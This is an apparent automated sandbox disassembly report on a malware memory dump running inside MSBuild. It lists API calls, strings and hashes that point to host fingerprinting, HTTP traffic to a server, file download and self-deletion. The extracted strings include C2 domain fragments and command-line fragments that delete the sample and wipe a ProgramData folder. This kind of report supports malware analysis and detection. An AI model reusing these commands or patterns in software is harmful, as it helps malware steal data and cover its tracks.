Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC5F
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD69
RtlAllocateHeap.NTDLL(00000000), ref: 0040AD70
StrCmpCA.SHLWAPI(?,004373D4,00000000), ref: 0040AE21
StrCmpCA.SHLWAPI(?,004373D8), ref: 0040AE49
lstrcatA.KERNEL32(00000000,?), ref: 0040AE6D
lstrcatA.KERNEL32(00000000,004373DC), ref: 0040AE79
lstrcatA.KERNEL32(00000000,?), ref: 0040AE83
lstrcatA.KERNEL32(00000000,004373E0), ref: 0040AE8F
lstrcatA.KERNEL32(00000000,?), ref: 0040AE99
lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA5
lstrcatA.KERNEL32(00000000,?), ref: 0040AEAF
lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBB
lstrcatA.KERNEL32(00000000,?), ref: 0040AEC5
lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED1
lstrcatA.KERNEL32(00000000,?), ref: 0040AEDB
lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE7
lstrcatA.KERNEL32(00000000,?), ref: 0040AEF1
lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFD
lstrlenA.KERNEL32(00000000), ref: 0040AF4F
lstrlenA.KERNEL32(?), ref: 0040AF6A
DeleteFileA.KERNEL32(?), ref: 0040AFAD

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: 9638e49814318a03725dbbb79c7d88dd2436a24dac8bdc88ee7113c1f82db6cc
Instruction ID: 55216650b863822d65479c506a4dcccb7e4ce4a509e1e20c7d7d020bfa3baaf7
Opcode Fuzzy Hash: 9638e49814318a03725dbbb79c7d88dd2436a24dac8bdc88ee7113c1f82db6cc
Instruction Fuzzy Hash: EDC14E32904209ABDF15FBA1ED4A9DD7B76EF04305F10502AF501B30B2DBB96E859B89

Function 004171CD Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1029networksleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 00410C28: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C34
Part of subcall function 00410C28: RtlAllocateHeap.NTDLL(00000000,?,?,?,004013B9), ref: 00410C3B
Part of subcall function 00410C28: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C4F

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

CloseHandle.KERNEL32(00000000,?,?,?,?,0041871B), ref: 00417269
OpenEventA.KERNEL32(001F0003,00000000,?,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00417278
CreateDirectoryA.KERNEL32(?,00000000,004366D6), ref: 00417796
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00417857
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00417870

Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB

Part of subcall function 00413A02: StrCmpCA.SHLWAPI(?,block,?,?,004178D0), ref: 00413A17
Part of subcall function 00413A02: ExitProcess.KERNEL32 ref: 00413A22

Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6

Part of subcall function 004131D8: strtok_s.MSVCRT ref: 004131F7
Part of subcall function 004131D8: strtok_s.MSVCRT ref: 0041327A

Sleep.KERNEL32(000003E8), ref: 00417C26

Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041871B), ref: 0041728C

Part of subcall function 00412554: __EH_prolog3_catch_GS.LIBCMT ref: 0041255E
Part of subcall function 00412554: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417FBD,.exe,00436CD4,00436CD0,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC), ref: 0041257D
Part of subcall function 00412554: Process32First.KERNEL32(00000000,00000128), ref: 0041258D
Part of subcall function 00412554: Process32Next.KERNEL32(00000000,00000128), ref: 0041259F
Part of subcall function 00412554: StrCmpCA.SHLWAPI(?), ref: 004125B1
Part of subcall function 00412554: CloseHandle.KERNEL32(00000000), ref: 004125C5

CloseHandle.KERNEL32(?), ref: 0041818C

Strings

cowod., xrefs: 00418007
8ecc9c7eaebfdf2a8cc0586d7419d6ea, xrefs: 00417898
_DEBUG.zip, xrefs: 004180C1
.exe, xrefs: 00417F90
.exe, xrefs: 004176D5
hopto, xrefs: 0041802B
org, xrefs: 00418073
http://, xrefs: 00417FE3

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocateConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
String ID: .exe$.exe$8ecc9c7eaebfdf2a8cc0586d7419d6ea$_DEBUG.zip$cowod.$hopto$http://$org
API String ID: 2665860859-3137422472
Opcode ID: 00521fe82851a7a6fa0f3ad988e7a8d7c50026c094090131c024817eb871e049
Instruction ID: fb67ed52a566258944bc7159f6d5f5ff2adad2422d960339d8edaa747ad890e2
Opcode Fuzzy Hash: 00521fe82851a7a6fa0f3ad988e7a8d7c50026c094090131c024817eb871e049
Instruction Fuzzy Hash: DC923F715083459BC620FF25D94268EB7E1FF84708F51482FF58477191DBB8AA8E8B8B

Function 004135E8 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 262stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0041362A
StrCmpCA.SHLWAPI(?,true), ref: 004136EC

Part of subcall function 0041051E: lstrlenA.KERNEL32(?,?,00417300,004366BE,004366BB,?,?,?,?,0041871B), ref: 00410524
Part of subcall function 0041051E: lstrcpyA.KERNEL32(00000000,00000000,?,00417300,004366BE,004366BB,?,?,?,?,0041871B), ref: 00410556

lstrcpyA.KERNEL32(?,?), ref: 004137AE
lstrcpyA.KERNEL32(?,00000000), ref: 004137DF
lstrcpyA.KERNEL32(?,00000000), ref: 0041381B
lstrcpyA.KERNEL32(?,00000000), ref: 00413857
lstrcpyA.KERNEL32(?,00000000), ref: 00413893
lstrcpyA.KERNEL32(?,00000000), ref: 004138CF
lstrcpyA.KERNEL32(?,00000000), ref: 0041390B
strtok_s.MSVCRT ref: 004139CF

Strings

a{A, xrefs: 004139F4
true, xrefs: 004136E6
false, xrefs: 00413705

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$lstrlen
String ID: a{A$false$true
API String ID: 2116072422-2100480347
Opcode ID: 33d7c4744b918c80d204451f52a7396b111834e37a69a1ce91c3a38b851a64c7
Instruction ID: c25931a9095c9d8e10e2498a4a46417764b166da5dcab449e0f17a70d63e4699
Opcode Fuzzy Hash: 33d7c4744b918c80d204451f52a7396b111834e37a69a1ce91c3a38b851a64c7
Instruction Fuzzy Hash: D3B138B59002189BCF60EF64DC89ADA77B5BF18305F0001EAE549A72A1DB75AFD4CF44

Function 00405237 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 161networkmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004177AD), ref: 0041050D

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
RtlAllocateHeap.NTDLL(00000000), ref: 00405285
InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
StrCmpCA.SHLWAPI(?), ref: 004052C1
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
InternetCloseHandle.WININET(?), ref: 00405439
InternetCloseHandle.WININET(?), ref: 00405445
InternetCloseHandle.WININET(?), ref: 00405451

Strings

yA, xrefs: 00405250, 00405457, 0040539E
GET, xrefs: 00405325

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET$yA
API String ID: 442264750-2870340693
Opcode ID: d21ee4bd772bfa97098b1171631170c12c0fb4564c1fb932326b5257c1942b01
Instruction ID: ee600abd7f67cca17ee5aeb8dfeae4a08fb5aeaf879ee2ccda1bafcbf8185c35
Opcode Fuzzy Hash: d21ee4bd772bfa97098b1171631170c12c0fb4564c1fb932326b5257c1942b01
Instruction Fuzzy Hash: BC511B71900A28AFDF20DF54DD85BEFBBB9EF08346F0050E6E909A2290D6755F818F54

Function 00401284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004012A7
_memset.LIBCMT ref: 004012B6
lstrcatA.KERNEL32(?,0043AA98), ref: 004012D0
lstrcatA.KERNEL32(?,0043AA9C), ref: 004012DE
lstrcatA.KERNEL32(?,0043AAA0), ref: 004012EC
lstrcatA.KERNEL32(?,0043AAA4), ref: 004012FA
lstrcatA.KERNEL32(?,0043AAA8), ref: 00401308
lstrcatA.KERNEL32(?,0043AAAC), ref: 00401316
lstrcatA.KERNEL32(?,0043AAB0), ref: 00401324
lstrcatA.KERNEL32(?,0043AAB4), ref: 00401332
lstrcatA.KERNEL32(?,0043AAB8), ref: 00401340
lstrcatA.KERNEL32(?,0043AABC), ref: 0040134E
lstrcatA.KERNEL32(?,0043AAC0), ref: 0040135C
lstrcatA.KERNEL32(?,0043AAC4), ref: 0040136A
lstrcatA.KERNEL32(?,0043AAC8), ref: 00401378

Part of subcall function 00410C5A: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C66
Part of subcall function 00410C5A: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C6D
Part of subcall function 00410C5A: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410C81

ExitProcess.KERNEL32 ref: 004013E3

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
String ID:
API String ID: 1553874529-0
Opcode ID: a824348476b66567d86e4ef9ffe9a047d71fde18680bc25f168bba7cad0eeea4
Instruction ID: bb02fb9038cc5557f02225f2a46e3415a2d0b68ff14653919e717e81e10c5939
Opcode Fuzzy Hash: a824348476b66567d86e4ef9ffe9a047d71fde18680bc25f168bba7cad0eeea4
Instruction Fuzzy Hash: D741A7B2D4422C67DB20EBB19D59FDB7BAC9F18310F5405A3E8C8E3181D67C9A84CB58

Function 004111D8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 155registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670E,00000000,?,?), ref: 00411248
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00411285
wsprintfA.USER32 ref: 004112B2
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112D1
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411307
lstrlenA.KERNEL32(?), ref: 0041131C

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E94), ref: 004113B1
RegCloseKey.ADVAPI32(?), ref: 0041141B
RegCloseKey.ADVAPI32(?), ref: 0041143B
RegCloseKey.ADVAPI32(?), ref: 00411447

Strings

?, xrefs: 00411238
- , xrefs: 004113BB
%s\%s, xrefs: 004112AC

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
String ID: - $%s\%s$?
API String ID: 2394436309-3278919252
Opcode ID: 46f65d37a904e0ae805c110f49f3f583c8ff1a0b29b9c805e250c4dcfe0bf4a1
Instruction ID: f7396fa090d5bfa975612bdb5a45328bc7e737bb7498c75da1f53f5e752104fb
Opcode Fuzzy Hash: 46f65d37a904e0ae805c110f49f3f583c8ff1a0b29b9c805e250c4dcfe0bf4a1
Instruction Fuzzy Hash: 6861F77590022CABEF21DF15DD84ECAB7B9AB04704F1082E6A609B2161DF756FC9CF54

Function 004183FD Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00418422
_memset.LIBCMT ref: 00418431
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 00418446

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

ShellExecuteEx.SHELL32(?), ref: 004185E2
_memset.LIBCMT ref: 004185F1
_memset.LIBCMT ref: 00418603
ExitProcess.KERNEL32 ref: 00418613

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

Strings

/c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 0041851C
" & rd /s /q "C:\ProgramData\, xrefs: 004184BF
" & exit, xrefs: 00418566
" & exit, xrefs: 00418515
/c timeout /t 10 & del /f /q ", xrefs: 00418471

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
API String ID: 2823247455-1079830800
Opcode ID: edf33d4b919684730d2f2f0e6ff40cd534e3860d89feeabb686b5836fc6a08f3
Instruction ID: 783b7a8b351e285aa33d0c5cad4ecf7f00b0bf00b1a7297e1d9cf3454930bdf3
Opcode Fuzzy Hash: edf33d4b919684730d2f2f0e6ff40cd534e3860d89feeabb686b5836fc6a08f3
Instruction Fuzzy Hash: FB51BCB1D4022A9BCB51EF25DD81ADDB37DAB44748F4110EAA70873152CB786FC68F58

Function 00410977 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109AA
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004109EA
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A3F
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A46
wsprintfA.USER32 ref: 00410A7C
lstrcatA.KERNEL32(00000000,00436E44), ref: 00410A8B

Part of subcall function 00411659: GetCurrentHwProfileA.ADVAPI32(?), ref: 00411674
Part of subcall function 00411659: _memset.LIBCMT ref: 004116A3
Part of subcall function 00411659: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116CB
Part of subcall function 00411659: lstrcatA.KERNEL32(?,00436ED4,?,?,?,?,?), ref: 004116E8

lstrlenA.KERNEL32(?), ref: 00410AA2

Part of subcall function 004123AA: malloc.MSVCRT ref: 004123AF
Part of subcall function 004123AA: strncpy.MSVCRT ref: 004123C0

lstrcatA.KERNEL32(00000000,00000000), ref: 00410AC5

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Strings

C, xrefs: 004109B4
QuBi, xrefs: 004109FC
:\, xrefs: 004109DB

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
String ID: :\$C$QuBi
API String ID: 1856320939-239756005
Opcode ID: bfca9a5609c2933791c31bbc8aeeb760fb68f044b76aa607bb08356c1204a9b6
Instruction ID: a9d48bac36ce4e52796d362ba97f9efa3c2660f46b60ffe502a063da8a4b64a5
Opcode Fuzzy Hash: bfca9a5609c2933791c31bbc8aeeb760fb68f044b76aa607bb08356c1204a9b6
Instruction Fuzzy Hash: A84181B19042289BCB259F759D85ADEBBBDEF09304F0010EAF549E3121D6748FD58F58

Function 004067ED Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004177AD), ref: 0041050D

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
StrCmpCA.SHLWAPI(?), ref: 00406856
InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
CloseHandle.KERNEL32(?), ref: 00406923
InternetCloseHandle.WININET(00000000), ref: 0040692A
InternetCloseHandle.WININET(?), ref: 00406936

Strings

|+A, xrefs: 00406954

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

